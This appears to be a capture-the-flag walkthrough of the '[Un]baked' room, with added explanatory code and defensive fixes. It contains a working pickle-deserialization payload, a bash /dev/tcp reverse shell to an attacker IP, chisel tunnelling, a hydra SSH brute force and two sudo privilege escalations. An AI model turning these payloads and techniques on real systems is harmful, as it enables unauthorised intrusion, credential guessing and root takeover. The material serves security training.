Port scan

nmap --min-rate=10000 -p- 10.10.118.24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-16 06:10 UTC
Nmap scan report for ip-10-10-118-24.eu-west-1.compute.internal (10.10.118.24)
Host is up (0.0020s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
5003/tcp open filemaker
MAC Address: 02:15:B6:1C:A2:91 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
nmap -sC -sT -sV -O -p5003 10.10.118.24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-16 06:11 UTC
Nmap scan report for ip-10-10-118-24.eu-west-1.compute.internal (10.10.118.24)
Host is up (0.00040s latency).

PORT STATE SERVICE VERSION
5003/tcp open filemaker?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Sat, 16 Mar 2024 06:11:16 GMT
| Server: WSGIServer/0.2 CPython/3.8.6
| Content-Type: text/html; charset=utf-8
| X-Frame-Options: DENY
| Vary: Cookie
| Content-Length: 7453
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| Set-Cookie: csrftoken=D4PpADZYUbPUATOPQHZS9mmUk75Cs4jbfbaRLbAgjvIfOfqeVWp0H68YLxKGVnQy; expires=Sat, 15 Mar 2025 06:11:16 GMT; Max-Age=31449600; Path=/; SameSite=Lax
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
| <meta name="description" content="">
| <meta name="author" content="">
| <title>[Un]baked | /</title>
| <!-- Bootstrap core CSS -->
| <link href="/static/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
| <!-- Custom fonts for this template -->
| <link href="/static/vendor/fontawesome-free/css/all.min.cs
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sat, 16 Mar 2024 06:11:17 GMT
| Server: WSGIServer/0.2 CPython/3.8.6
| Content-Type: text/html; charset=utf-8
| X-Frame-Options: DENY
| Vary: Cookie
| Content-Length: 7453
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| Set-Cookie: csrftoken=3pRdS6yIHTkir6MpsNt1dFnyinKIK9sYMjRKL9MnhMTcwmEQZlPKUeg55ZZvKBBa; expires=Sat, 15 Mar 2025 06:11:17 GMT; Max-Age=31449600; Path=/; SameSite=Lax
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
| <meta name="description" content="">
| <meta name="author" content="">
| <title>[Un]baked | /</title>
| <!-- Bootstrap core CSS -->
| <link href="/static/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
| <!-- Custom fonts for this template -->
|_ <link href="/static/vendor/fontawesome-free/css/all.min.cs
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5003-TCP:V=7.93%I=7%D=3/16%Time=65F53805%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,1C59,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2016\x20Mar\x20
SF:2024\x2006:11:16\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.
SF:6\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x
SF:20DENY\r\nVary:\x20Cookie\r\nContent-Length:\x207453\r\nX-Content-Type-
SF:Options:\x20nosniff\r\nReferrer-Policy:\x20same-origin\r\nSet-Cookie:\x
SF:20\x20csrftoken=D4PpADZYUbPUATOPQHZS9mmUk75Cs4jbfbaRLbAgjvIfOfqeVWp0H68
SF:YLxKGVnQy;\x20expires=Sat,\x2015\x20Mar\x202025\x2006:11:16\x20GMT;\x20
SF:Max-Age=31449600;\x20Path=/;\x20SameSite=Lax\r\n\r\n\n<!DOCTYPE\x20html
SF:>\n<html\x20lang=\"en\">\n\n<head>\n\n\x20\x20<meta\x20charset=\"utf-8\
SF:">\n\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,
SF:\x20initial-scale=1,\x20shrink-to-fit=no\">\n\x20\x20<meta\x20name=\"de
SF:scription\"\x20content=\"\">\n\x20\x20<meta\x20name=\"author\"\x20conte
SF:nt=\"\">\n\n\x20\x20<title>\[Un\]baked\x20\|\x20/</title>\n\n\x20\x20<!
SF:--\x20Bootstrap\x20core\x20CSS\x20-->\n\x20\x20<link\x20href=\"/static/
SF:vendor/bootstrap/css/bootstrap\.min\.css\"\x20rel=\"stylesheet\">\n\n\x
SF:20\x20<!--\x20Custom\x20fonts\x20for\x20this\x20template\x20-->\n\x20\x
SF:20<link\x20href=\"/static/vendor/fontawesome-free/css/all\.min\.cs")%r(
SF:HTTPOptions,1EC5,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2016\x20Mar\
SF:x202024\x2006:11:17\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.
SF:8\.6\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options
SF::\x20DENY\r\nVary:\x20Cookie\r\nContent-Length:\x207453\r\nX-Content-Ty
SF:pe-Options:\x20nosniff\r\nReferrer-Policy:\x20same-origin\r\nSet-Cookie
SF::\x20\x20csrftoken=3pRdS6yIHTkir6MpsNt1dFnyinKIK9sYMjRKL9MnhMTcwmEQZlPK
SF:Ueg55ZZvKBBa;\x20expires=Sat,\x2015\x20Mar\x202025\x2006:11:17\x20GMT;\
SF:x20Max-Age=31449600;\x20Path=/;\x20SameSite=Lax\r\n\r\n\n<!DOCTYPE\x20h
SF:tml>\n<html\x20lang=\"en\">\n\n<head>\n\n\x20\x20<meta\x20charset=\"utf
SF:-8\">\n\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-wid
SF:th,\x20initial-scale=1,\x20shrink-to-fit=no\">\n\x20\x20<meta\x20name=\
SF:"description\"\x20content=\"\">\n\x20\x20<meta\x20name=\"author\"\x20co
SF:ntent=\"\">\n\n\x20\x20<title>\[Un\]baked\x20\|\x20/</title>\n\n\x20\x2
SF:0<!--\x20Bootstrap\x20core\x20CSS\x20-->\n\x20\x20<link\x20href=\"/stat
SF:ic/vendor/bootstrap/css/bootstrap\.min\.css\"\x20rel=\"stylesheet\">\n\
SF:n\x20\x20<!--\x20Custom\x20fonts\x20for\x20this\x20template\x20-->\n\x2
SF:0\x20<link\x20href=\"/static/vendor/fontawesome-free/css/all\.min\.cs");
MAC Address: 02:15:B6:1C:A2:91 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.77 seconds

Getshell

Only port 5003 is open, and probing shows a Django application behind it (WSGIServer/CPython banner, csrftoken cookie). The room hint says deserialization, so capture the search, login and registration pages in a proxy; the search page is the one that sets a search_cookie.

POST /search HTTP/1.1
Host: 10.10.118.24:5003
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.118.24:5003/search
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://10.10.118.24:5003
Connection: close
Cookie: csrftoken=ddxfbdti3hwvCVPSll5CWHYUN86XyjRm7xBnaNzgcOQUX9yWqnSu4k4uwsmMGjFH; search_cookie="gASVCAAAAAAAAACMBDExMTGULg=="
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=eAM93708tMC0u2q3DxT7AFimtDrb2wyP8UQh2H66CjWpPg97IzGZIioWcXH0awma&query=11

The response carries Set-Cookie: search_cookie="gASVBgAAAAAAAACMAjExlC4="

Base64-decode it and unpickle the result:

import base64
import pickle

# search_cookie value returned by the server after searching for "11"
cookie = "gASVBgAAAAAAAACMAjExlC4="

raw_data = base64.b64decode(cookie)

# the decoded bytes start with 0x80 0x04 (PROTO 4): a Python 3 pickle stream
result = pickle.loads(raw_data)

print(result)
python test.py
11

So the server pickles our search input and stores it in the cookie. Exploitation is then direct: send a cookie of our own and the server base64-decodes it and calls pickle.loads on it, which executes whatever callable our pickle's __reduce__ returns.

import pickle, os, base64

class SerializedPickle(object):
    # pickle stores whatever __reduce__ returns; when the server calls
    # pickle.loads it runs os.system("ping -c 1 10.11.77.28") to "rebuild" the object
    def __reduce__(self):
        return (os.system, ("ping -c 1 10.11.77.28",))

payload = base64.b64encode(pickle.dumps(SerializedPickle())).decode()
print(payload)

Start tcpdump listening for ICMP, capture a /search request, replace the search_cookie value with the payload and resend it; the ping comes in.

POST /search HTTP/1.1
Host: 10.10.118.24:5003
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.118.24:5003/search
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://10.10.118.24:5003
Connection: close
Cookie: csrftoken=ddxfbdti3hwvCVPSll5CWHYUN86XyjRm7xBnaNzgcOQUX9yWqnSu4k4uwsmMGjFH; search_cookie="gASVMAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBVwaW5nIC1jIDEgMTAuMTEuNzcuMjiUhZRSlC4="
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=RD1FaRUPpiWWaIBcr77Lv5YVnU0dORoqLX5N9r0NyPglvWkgw9UDDI4v6eg2WRcL&query=1111

Change the command to a reverse shell:

import pickle, os, base64

class SerializedPickle(object):
    # same gadget, but the command now opens a reverse shell to 10.11.77.28:443
    def __reduce__(self):
        return (os.system, ("bash -c '0<&134-;exec 134<>/dev/tcp/10.11.77.28/443;sh <&134 >&134 2>&134'",))

payload = base64.b64encode(pickle.dumps(SerializedPickle())).decode()
print(payload)

Start a listener on 443 and a reverse shell comes back as root. Root straight away is a hint that we are inside a Docker container rather than on the host (check for /.dockerenv and the 172.17.0.0/16 address).
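
The whole chain above, as an added example that is not code from the writeup or from the room's application: a stand-in for the vulnerable /search view that reproduces the observed cookie values byte for byte, the same __reduce__ gadget written as a function, and two server-side fixes. The server-side functions are an assumption reconstructed from the cookie format, and SECRET is a constructed demo value, not the application's key.

```python
import base64
import hashlib
import hmac
import io
import json
import os
import pickle

# Server side, as it must look for the observed cookies to come out.
# Assumption: the real /search view is not on the page; this is a stand-in.
def make_search_cookie(query):
    """Pickle the search query and base64 it, exactly as the target's cookie shows."""
    return base64.b64encode(pickle.dumps(query, protocol=4)).decode()

def read_search_cookie_unsafe(cookie):
    """The bug: a client-controlled cookie goes straight into pickle.loads."""
    return pickle.loads(base64.b64decode(cookie))

# Attacker side: any object whose __reduce__ returns (callable, args) makes the
# unpickler call that callable while "rebuilding" the object.
def build_gadget_cookie(func, args):
    class Gadget:
        def __reduce__(self):
            return (func, args)
    return base64.b64encode(pickle.dumps(Gadget(), protocol=4)).decode()

def build_os_system_cookie(command):
    """Same gadget as the writeup's SerializedPickle class."""
    return build_gadget_cookie(os.system, (command,))

def gadget_executes_on_load():
    """Harmless proof that unpickling runs attacker-chosen code: os.getpid is
    invoked inside the 'server' process and its return value comes back."""
    cookie = build_gadget_cookie(os.getpid, ())
    return read_search_cookie_unsafe(cookie) == os.getpid()

# Fix 1: keep pickle but refuse every global lookup. STACK_GLOBAL/GLOBAL then
# fail before REDUCE can run; plain str/int/list/dict data still loads.
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def read_search_cookie_restricted(cookie):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(cookie))).load()

def restricted_rejects(cookie):
    try:
        read_search_cookie_restricted(cookie)
    except pickle.UnpicklingError:
        return True
    return False

# Fix 2 (preferred): never unpickle client data. JSON carries the query and an
# HMAC over the encoded body stops the client from editing it at all.
SECRET = b"constructed-demo-key, not the application's"  # assumption

def make_signed_cookie(query, secret=SECRET):
    body = base64.urlsafe_b64encode(json.dumps(query).encode()).decode()
    tag = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"

def read_signed_cookie(cookie, secret=SECRET):
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("search_cookie signature mismatch")
    return json.loads(base64.urlsafe_b64decode(body))

def signed_cookie_tamper_detected():
    """Swap the body for a different query but keep the old tag: must be rejected."""
    cookie = make_signed_cookie("11")
    _, _, tag = cookie.rpartition(".")
    forged = base64.urlsafe_b64encode(b'"1111"').decode() + "." + tag
    try:
        read_signed_cookie(forged)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(make_search_cookie("11"))                        # the Set-Cookie value from the writeup
    print(read_search_cookie_unsafe("gASVCAAAAAAAAACMBDExMTGULg=="))
    print(build_os_system_cookie("ping -c 1 10.11.77.28"))   # the cookie sent in the ping test
    print(gadget_executes_on_load(), restricted_rejects(build_os_system_cookie("id")))
    print(read_signed_cookie(make_signed_cookie("11")), signed_cookie_tamper_detected())
```

Django already ships the second fix: HttpResponse.set_signed_cookie() and HttpRequest.get_signed_cookie() (backed by django.core.signing) sign a string with SECRET_KEY, so a view never needs pickle for client-held state. The restricted unpickler is a stopgap for code that cannot change formats; it stops this gadget because the STACK_GLOBAL opcode resolves posix.system through find_class, but it does nothing against cookies that are merely tampered with.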

Docker escape

IP: 172.17.0.2/16 (the default docker0 bridge, so the Docker host is the gateway at 172.17.0.1)

root's shell history was never cleared and contains ssh ramsey@172.17.0.1, which hands us a username and confirms that the host's SSH is reachable from inside the container.

Use chisel to forward the host's SSH port back to Kali.

On Kali:

./chisel server -p 8000 --reverse

On the target (inside the container):

./chisel client 10.11.77.28:8000 R:22:172.17.0.1:22

This binds port 22 on Kali, so the chisel server needs root there and a port 22 not already taken by a local sshd; otherwise pick another local port, e.g. R:2222:172.17.0.1:22, and point hydra and ssh at localhost:2222 instead.

The app directory inside the container holds a db.sqlite3. Copy it to Kali and open it with sqlite3; the auth_user table contains the password hash of user ramsey:

pbkdf2_sha256$216000$hyUSJhGMRWCz$vZzXiysi8upGO/DlQy+w6mRHf4scq8FMnc1pWufS+Ik=

https://hashcat.net/wiki/doku.php?id=example_hashes

The format matches hashcat mode 10000 (Django PBKDF2-SHA256). hashcat ran for a long time without cracking it, and in any case the web application's password need not be the same as ramsey's system password.
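
What hashcat mode 10000 actually computes, as an added example that is not part of the writeup: a parser and verifier for Django's pbkdf2_sha256$iterations$salt$digest encoding built on hashlib alone, plus a tiny candidate loop. The candidate list is constructed; the writeup does not establish whether the SSH password also matches this database hash, so the script only reports what it finds.

```python
import base64
import hashlib
import hmac

# Hash copied from the writeup's auth_user table.
RAMSEY_HASH = "pbkdf2_sha256$216000$hyUSJhGMRWCz$vZzXiysi8upGO/DlQy+w6mRHf4scq8FMnc1pWufS+Ik="

def parse_django_pbkdf2(encoded):
    """Split Django's 'algorithm$iterations$salt$base64digest' encoding."""
    algorithm, iterations, salt, digest = encoded.split("$", 3)
    if algorithm != "pbkdf2_sha256":
        raise ValueError(f"unsupported hasher {algorithm}")
    return int(iterations), salt, digest

def django_pbkdf2_sha256(password, salt, iterations):
    """What Django's PBKDF2PasswordHasher computes and hashcat -m 10000 reproduces:
    PBKDF2-HMAC-SHA256 over the password with the ASCII salt, base64-encoded."""
    raw = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return base64.b64encode(raw).decode()

def make_django_hash(password, salt, iterations):
    """Produce an encoded hash in the same format (used here to build test data)."""
    return f"pbkdf2_sha256${iterations}${salt}${django_pbkdf2_sha256(password, salt, iterations)}"

def check_password(password, encoded):
    iterations, salt, digest = parse_django_pbkdf2(encoded)
    return hmac.compare_digest(django_pbkdf2_sha256(password, salt, iterations), digest)

def crack(encoded, candidates):
    """Return the first candidate that matches, or None. At 216000 iterations each
    guess costs a few milliseconds in OpenSSL, fine for a handful of words;
    a full rockyou run is what hashcat on a GPU is for."""
    for word in candidates:
        if check_password(word, encoded):
            return word
    return None

if __name__ == "__main__":
    print(parse_django_pbkdf2(RAMSEY_HASH))
    # constructed candidates; result is simply reported, nothing is assumed about it
    print(crack(RAMSEY_HASH, ["password", "123456", "12345678"]))
```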

Try brute-forcing SSH directly through the forwarded port instead:

hydra -l ramsey -P /usr/share/wordlists/rockyou.txt ssh://localhost -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-16 08:14:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://localhost:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://ramsey@127.0.0.1:22
[INFO] Successful, password authentication is supported by ssh://127.0.0.1:22
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Disabled child 15 because of too many errors
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Disabled child 14 because of too many errors
[22][ssh] host: localhost login: ramsey password: 12345678
[STATUS] attack finished for localhost (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-16 08:14:45

What a weak password.

ramsey@unbaked:~$ sudo -l
[sudo] password for ramsey:
Matching Defaults entries for ramsey on unbaked:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ramsey may run the following commands on unbaked:
(oliver) /usr/bin/python /home/ramsey/vuln.py

Privilege escalation

The rule runs /home/ramsey/vuln.py as oliver, and /home/ramsey is of course writable by ramsey, so we replace vuln.py with a file containing import os; os.system('/bin/bash').

Running sudo -u oliver /usr/bin/python /home/ramsey/vuln.py drops us into a shell as oliver.

oliver@unbaked:/home/oliver$ sudo -l
Matching Defaults entries for oliver on unbaked:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User oliver may run the following commands on unbaked:
(root) SETENV: NOPASSWD: /usr/bin/python /opt/dockerScript.py

SETENV means sudo keeps environment variables passed on the command line, PYTHONPATH included, so this is a library hijack at a glance.

Create /tmp/docker.py containing import os; os.system('/bin/bash'), named after the module /opt/dockerScript.py imports, then run:

sudo -u root PYTHONPATH=/tmp/ /usr/bin/python /opt/dockerScript.py

Now we are root!
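
An added example, not the room's files, that reproduces the mechanism in a sandbox without sudo: a stand-in dockerScript.py is run with and without PYTHONPATH preserved, which is exactly the difference between a plain env_reset sudo rule and one marked SETENV. The script bodies are assumptions; all the demo relies on is that /opt/dockerScript.py imports a module named docker, which is what the writeup's docker.py trick implies.

```python
import os
import subprocess
import sys
import tempfile

# Stand-ins (assumptions): the real /opt/dockerScript.py is not on the page.
DOCKER_SCRIPT = "import docker\nprint('imported', docker.__file__)\n"
# The rogue module only prints here; in the writeup it runs os.system('/bin/bash').
ROGUE_MODULE = "print('hijacked: docker loaded from', __file__)\n"

def run_docker_script(keep_pythonpath):
    """Run a copy of dockerScript.py the way sudo would. env_reset strips
    PYTHONPATH from the environment unless the rule carries SETENV
    (keep_pythonpath=True). Returns (returncode, stdout, stderr)."""
    with tempfile.TemporaryDirectory() as root:
        opt, tmp = os.path.join(root, "opt"), os.path.join(root, "tmp")
        os.makedirs(opt)
        os.makedirs(tmp)
        script = os.path.join(opt, "dockerScript.py")
        with open(script, "w") as f:
            f.write(DOCKER_SCRIPT)
        with open(os.path.join(tmp, "docker.py"), "w") as f:
            f.write(ROGUE_MODULE)
        # env_reset: start from the caller's environment minus PYTHONPATH
        env = {k: v for k, v in os.environ.items() if k != "PYTHONPATH"}
        if keep_pythonpath:
            # sys.path order is: script directory, PYTHONPATH entries, stdlib,
            # site-packages. /tmp/docker.py therefore wins over any installed
            # docker package, and would also shadow stdlib modules that are not
            # yet imported when the script starts.
            env["PYTHONPATH"] = tmp
        proc = subprocess.run([sys.executable, script], env=env,
                              capture_output=True, text=True)
        return proc.returncode, proc.stdout, proc.stderr

def hijack_succeeds():
    """True when the rogue module ran in place of the real one."""
    rc, out, _ = run_docker_script(keep_pythonpath=True)
    return rc == 0 and "hijacked" in out

if __name__ == "__main__":
    # without SETENV the import either fails or finds the genuine package
    print("env_reset only:", run_docker_script(False)[:2])
    print("with SETENV   :", run_docker_script(True)[:2])
```

The defensive reading is the mirror image: a sudo rule that runs an interpreter should never carry SETENV, and a script that must be run via sudo should be invoked with python -I (isolated mode ignores PYTHONPATH and the script directory) or have its imports pinned to an absolute, root-owned directory.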

Closing thoughts

All familiar techniques, yet I still got stuck for quite a while. A good-quality room nonetheless.